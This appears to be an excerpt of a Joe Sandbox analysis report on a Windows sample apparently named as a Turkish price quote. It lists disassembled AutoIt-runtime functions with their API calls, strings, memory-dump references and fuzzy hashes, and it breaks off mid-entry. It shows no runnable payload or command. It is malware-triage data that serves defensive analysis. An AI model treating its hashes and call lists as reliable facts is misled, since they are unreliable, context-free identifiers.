Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: d373823475363c3ce1fba9ac1fa1dba09545d4f916ad27cd759a979428d20f70
Instruction ID: 9955965ab5080b1c3610fd4f9097749232e3c8e58bd8d9d796e3cde478085d9e
Opcode Fuzzy Hash: d373823475363c3ce1fba9ac1fa1dba09545d4f916ad27cd759a979428d20f70
Instruction Fuzzy Hash: 3D418A75A01209EFDF14CFA4E844BEA7BB6FF49364F144428F94697360D730AA11CB90

Uniqueness

Uniqueness Score: -1.00%

Function 009E1EDF Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD

Part of subcall function 009E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 009E3CCA

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 009E1F64
GetDlgCtrlID.USER32 ref: 009E1F6F
GetParent.USER32 ref: 009E1F8B
SendMessageW.USER32(00000000,?,00000111,?), ref: 009E1F8E
GetDlgCtrlID.USER32(?), ref: 009E1F97
GetParent.USER32(?), ref: 009E1FAB
SendMessageW.USER32(00000000,?,00000111,?), ref: 009E1FAE

Strings

ComboBox, xrefs: 009E1EEC
ListBox, xrefs: 009E1F21

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: c9f9f3f5530cd89ad90f5c45e6b029374da8af4c6f0cdf432195d56df4d05f98
Instruction ID: a26bad189a61e9c4304f60895d57eeffb9e38f1ad4f4b4b3d4fd96341692d636
Opcode Fuzzy Hash: c9f9f3f5530cd89ad90f5c45e6b029374da8af4c6f0cdf432195d56df4d05f98
Instruction Fuzzy Hash: B621FF74900214BFCF01EFA0CC84EFEBBB9EF45310B108505F961A32A1DB398949CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A13A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A13A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00A13AA0
GetWindowLongW.USER32(?,000000F0), ref: 00A13AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A13AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00A13B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00A13BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00A13BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00A13BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00A13BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00A13C13

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: b8c8beca91a4c509a155a3fab42b2d19b8a2c60cc9718ba9046835a867ced0b4
Instruction ID: 1d8fb2ddaddfb223e9473c8413334a48d112e03fbbb59de3cf387db68bb4d18a
Opcode Fuzzy Hash: b8c8beca91a4c509a155a3fab42b2d19b8a2c60cc9718ba9046835a867ced0b4
Instruction Fuzzy Hash: E6617A75900248EFDB10DFA8CC81EEE77B8EB09710F104199FA15EB2A1D774AE86DB50

Uniqueness

Uniqueness Score: -1.00%

Function 009B2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 009B2C94

Part of subcall function 009B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000), ref: 009B29DE
Part of subcall function 009B29C8: GetLastError.KERNEL32(00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000,00000000), ref: 009B29F0

_free.LIBCMT ref: 009B2CA0
_free.LIBCMT ref: 009B2CAB
_free.LIBCMT ref: 009B2CB6
_free.LIBCMT ref: 009B2CC1
_free.LIBCMT ref: 009B2CCC
_free.LIBCMT ref: 009B2CD7
_free.LIBCMT ref: 009B2CE2
_free.LIBCMT ref: 009B2CED
_free.LIBCMT ref: 009B2CFB

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2803525660f4c66707c09977a4e7528fe692ec6ef7d09d7911709cda8ca906ec
Instruction ID: 64834dab36878a3764ac5f8550d2df23f2033d86de1d680e4e9841eaee6f24f4
Opcode Fuzzy Hash: 2803525660f4c66707c09977a4e7528fe692ec6ef7d09d7911709cda8ca906ec
Instruction Fuzzy Hash: 11115976510108BFCB02EF54DA42DDD3BA5FF45360F5149A5F94C5F222DA31EE509B90

Uniqueness

Uniqueness Score: -1.00%

Function 00981410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00981459
OleUninitialize.OLE32(?,00000000), ref: 009814F8
UnregisterHotKey.USER32(?), ref: 009816DD
DestroyWindow.USER32(?), ref: 009C24B9
FreeLibrary.KERNEL32(?), ref: 009C251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 009C254B

Strings

close all, xrefs: 00981454

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 126b0f867ff7f01ff3387ffdd7af8689bd9de1aa07ad01914b47b22324ea9694
Instruction ID: 0e5ef459f6c3a0a96a10b7c9c452fb27691fb348dac4675c9a882888e0744a86
Opcode Fuzzy Hash: 126b0f867ff7f01ff3387ffdd7af8689bd9de1aa07ad01914b47b22324ea9694
Instruction Fuzzy Hash: E8D14731B012128FCB19EF54C999F69F7A8BF45710F2442ADE44AAB362DB31AD12CF51

Uniqueness

Uniqueness Score: -1.00%

Function 009F7DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009F7FAD
SetCurrentDirectoryW.KERNEL32(?), ref: 009F7FC1
GetFileAttributesW.KERNEL32(?), ref: 009F7FEB
SetFileAttributesW.KERNEL32(?,00000000), ref: 009F8005
SetCurrentDirectoryW.KERNEL32(?), ref: 009F8017
SetCurrentDirectoryW.KERNEL32(?), ref: 009F8060
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 009F80B0

Strings

*.*, xrefs: 009F8066

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: dfaf3eea4530dd80b6ab5918b50a2691bfc6fd4147235f7a41757a5df63beb45
Instruction ID: c890e22acd9b2ce9bd8d5d08c1dfc66c6f1575ec5e6c3a495c8bd31dc174a472
Opcode Fuzzy Hash: dfaf3eea4530dd80b6ab5918b50a2691bfc6fd4147235f7a41757a5df63beb45
Instruction Fuzzy Hash: E281AF715082099BCB20EF94C844ABAF3E8BF89314F584C5EFA95D7260EB34DD458B92

Uniqueness

Uniqueness Score: -1.00%

Function 00985BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00985C7A

Part of subcall function 00985D0A: GetClientRect.USER32(?,?), ref: 00985D30
Part of subcall function 00985D0A: GetWindowRect.USER32(?,?), ref: 00985D71
Part of subcall function 00985D0A: ScreenToClient.USER32(?,?), ref: 00985D99

GetDC.USER32 ref: 009C46F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 009C4708
SelectObject.GDI32(00000000,00000000), ref: 009C4716
SelectObject.GDI32(00000000,00000000), ref: 009C472B
ReleaseDC.USER32(?,00000000), ref: 009C4733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009C47C4

Strings

U, xrefs: 009C4693

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 1c5be201fa5ae79157362fae69933f9981d264c5b04ac0160ab49829204f95fb
Instruction ID: 6617c55a256eba91079bd95159b6b12b1ed8032e6a77478eb2a8a629d148892b
Opcode Fuzzy Hash: 1c5be201fa5ae79157362fae69933f9981d264c5b04ac0160ab49829204f95fb
Instruction Fuzzy Hash: 3571BC31A00205DFCF21DF64C9A4FEA3BB9FF4A364F144669ED555A2AAC3308851DF52

Uniqueness

Uniqueness Score: -1.00%

Function 009F359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 009F35E4

Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD

LoadStringW.USER32(00A52390,?,00000FFF,?), ref: 009F360A

Strings

^ ERROR, xrefs: 009F36C9
"%s" (%d) : ==> %s:, xrefs: 009F3742
"%s" (%d) : ==> %s:%s%s, xrefs: 009F3724
Error: , xrefs: 009F36EF
Line %d (File "%s"):, xrefs: 009F366B

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 5e31bbe4c355802323f733320a87240b82ee4c84831d069d4d26e335e96cb9c8
Instruction ID: f8c6f080c757e25164ab4cc444994bccf343113182004e112f0d5f05aee3e27c
Opcode Fuzzy Hash: 5e31bbe4c355802323f733320a87240b82ee4c84831d069d4d26e335e96cb9c8
Instruction Fuzzy Hash: D0514B7180020ABADF15FBA0CC46FFDBB78AF94350F148125F205722A1EB351B99DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A18B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00999BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00999BB2

Part of subcall function 0099912D: GetCursorPos.USER32(?), ref: 00999141
Part of subcall function 0099912D: ScreenToClient.USER32(00000000,?), ref: 0099915E
Part of subcall function 0099912D: GetAsyncKeyState.USER32(00000001), ref: 00999183
Part of subcall function 0099912D: GetAsyncKeyState.USER32(00000002), ref: 0099919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00A18B6B
ImageList_EndDrag.COMCTL32 ref: 00A18B71
ReleaseCapture.USER32 ref: 00A18B77
SetWindowTextW.USER32(?,00000000), ref: 00A18C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00A18C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00A18CFF

Strings

@GUI_DROPID, xrefs: 00A18C51
@GUI_DRAGFILE, xrefs: 00A18C9A

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 991c941823e237b2c9adb7f7f20bb97a13e2acb06037f6ad36af544cf7bea9c5
Instruction ID: 2d881630fc7a69e56e48b28a6200871815c12d583fc6bd8d40891724fc2f82eb
Opcode Fuzzy Hash: 991c941823e237b2c9adb7f7f20bb97a13e2acb06037f6ad36af544cf7bea9c5
Instruction Fuzzy Hash: AE518970104300AFD700EF64DC96FAA77E5FB88715F400A2DF996A72A1CB759944CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 009FC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009FC272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009FC29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009FC2CA
GetLastError.KERNEL32 ref: 009FC322
SetEvent.KERNEL32(?), ref: 009FC336
InternetCloseHandle.WININET(00000000), ref: 009FC341

Strings

, xrefs: 009FC2BB

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 09ee38b0d90b73c6b6b9588c7cb575a8b25be7451cd5b3a098a1c4ed63428e7b
Instruction ID: ad5e7aceedb66219e5a07d3a256c01556378cd9c4baa39b2ed1854e4fdaedd13
Opcode Fuzzy Hash: 09ee38b0d90b73c6b6b9588c7cb575a8b25be7451cd5b3a098a1c4ed63428e7b
Instruction Fuzzy Hash: 0A319AB160020CAFD721DFA48E88ABB7BFCEB49794B14C51EF546D2240DB74ED059B61

Uniqueness

Uniqueness Score: -1.00%

Function 009E989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009C3AAF,?,?,Bad directive syntax error,00A1CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 009E98BC
LoadStringW.USER32(00000000,?,009C3AAF,?), ref: 009E98C3

Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 009E9987

Strings

Error: , xrefs: 009E9955
Line %d:, xrefs: 009E9912
%s (%d) : ==> %s.: %s %s, xrefs: 009E98F1
., xrefs: 009E996D
Line %d (File "%s"):, xrefs: 009E992D

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: ffd60f99588afb90a54bce0e49af26541803074f77c5125e107dfd2838c8cdba
Instruction ID: 73ac59a034204345e0b8b154cc4abfe74bc5286b06ba00beae90d3ebb09f2466
Opcode Fuzzy Hash: ffd60f99588afb90a54bce0e49af26541803074f77c5125e107dfd2838c8cdba
Instruction Fuzzy Hash: 2721803194021ABBCF16EF90CC06FEE7739FF59700F04881AF519661A2EB759A18DB51

Uniqueness

Uniqueness Score: -1.00%

Function 009E209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 009E20AB
GetClassNameW.USER32(00000000,?,00000100), ref: 009E20C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 009E214D

Strings

list, xrefs: 009E212F
details, xrefs: 009E20FB
largeicons, xrefs: 009E20E1
smallicons, xrefs: 009E2115
SHELLDLL_DefView, xrefs: 009E20CC

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: f14131541147006197e7b5658529dbc03efd708b1f5cc4d101d18ad40df8857a
Instruction ID: 59ea73f9b92e4ee68a6e5370ae67a436d5160118f8b2cbb303cc5091c3bac9d0
Opcode Fuzzy Hash: f14131541147006197e7b5658529dbc03efd708b1f5cc4d101d18ad40df8857a
Instruction Fuzzy Hash: 7B11297A6CC706BAF6026331EC07EE6379CDF46324B200416FB04A50E2FEB5AD035654

Uniqueness

Uniqueness Score: -1.00%

Function 009BCE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 009BCEB7
_free.LIBCMT ref: 009BCF22
_free.LIBCMT ref: 009BCF48
_free.LIBCMT ref: 009BCF71
_free.LIBCMT ref: 009BCFA9
_free.LIBCMT ref: 009BCFDA
_free.LIBCMT ref: 009BD01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 009BD09C
_free.LIBCMT ref: 009BD0B5

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: fd4e22a17b3fe487a3c9f626e601687076f851afb1070c8e4ac57c9b88a2a4c5
Instruction ID: b66297b05868fdb54cc73603d252ad424516e943a95e6ba356de892f4e81b2e4
Opcode Fuzzy Hash: fd4e22a17b3fe487a3c9f626e601687076f851afb1070c8e4ac57c9b88a2a4c5
Instruction Fuzzy Hash: F76129B2905301BFDB21AFF49A81BFA7BA9EF45330F0445ADF944A7282E6319D018790

Uniqueness

Uniqueness Score: -1.00%

Function 00A150D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00A15186
ShowWindow.USER32(?,00000000), ref: 00A151C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 00A151CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 00A151D1

Part of subcall function 00A16FBA: DeleteObject.GDI32(00000000), ref: 00A16FE6

GetWindowLongW.USER32(?,000000F0), ref: 00A1520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A1521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00A1524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00A15287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00A15296

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 02ab91cb57fe9ccae3155ec3a3149e7d6042236f6f6078394b09a84989b313fc
Instruction ID: db5ba6f0589cb32c97052eaba25cf2f1c9744b943db32ad72a189fd6f8817cb8
Opcode Fuzzy Hash: 02ab91cb57fe9ccae3155ec3a3149e7d6042236f6f6078394b09a84989b313fc
Instruction Fuzzy Hash: A8517031E90A08FEEF21AF78CC49BD93B65BB85321F148215F625962E0C7B5A9D0DB41

Uniqueness

Uniqueness Score: -1.00%

Function 00998B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 009D6890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 009D68A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009D68B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 009D68D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009D68F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00998874,00000000,00000000,00000000,000000FF,00000000), ref: 009D6901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 009D691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00998874,00000000,00000000,00000000,000000FF,00000000), ref: 009D692D

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 7e50035ac2264b8a6fe50abdfdfadf64083a9ace994e50864abf5ddb6021eab1
